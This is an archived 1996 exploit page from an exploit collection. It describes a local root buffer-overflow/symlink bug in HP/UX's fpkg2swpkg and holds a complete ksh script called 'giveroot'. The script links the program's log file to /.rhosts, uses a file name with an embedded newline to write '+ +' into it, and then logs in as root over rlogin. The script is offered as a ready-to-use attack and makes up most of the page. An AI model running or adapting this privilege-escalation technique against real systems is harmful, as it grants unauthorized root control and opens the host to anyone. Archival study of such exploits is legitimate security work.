SOD HP/UX /tmp/fpkg2swpk bug

Summary

Description:	Standard buffer overflow
Author:	Dog Catcher
Compromise:	root (local)
Vulnerable Systems:	HP/UX with vulnerable fpkg2swpk, probably just 10.x
Date:	November 1996
Notes:	See the SOD HP Bug of the Week page

Details

Exploit:


#!/bin/ksh
# giveroot Version 1.1 (C) 1996 Dog Catcher
# gives you root by poking + + into /.rhosts
# this version even works on mode 600 /.rhosts
# tested on HP/UX 10.01

# setup stuff
FILE=/tmp/fpkg2swpk
LOG=/tmp/fpkg2swpkg.log
DUMMY=/tmp/"`echo '\n+ +'`"
SUCKER=/usr/sbin/fpkg2swpkg
RHOSTS=/.rhosts

# naughty bits
touch ${FILE}
rm -f ${LOG}
ln -s ${RHOSTS} ${LOG}
ln -s ${SUCKER} "${DUMMY}"
"${DUMMY}" ${FILE}

# tidy up
rm -f ${FILE} "${DUMMY}" ${LOG}

# i wanna hash prompt
rlogin `uname -n` -l root

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:

All OS's	Linux	Solaris/SunOS	Micro$oft
*BSD	Macintosh	AIX	IRIX
ULTRIX/Digital UNIX	HP/UX	SCO	Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: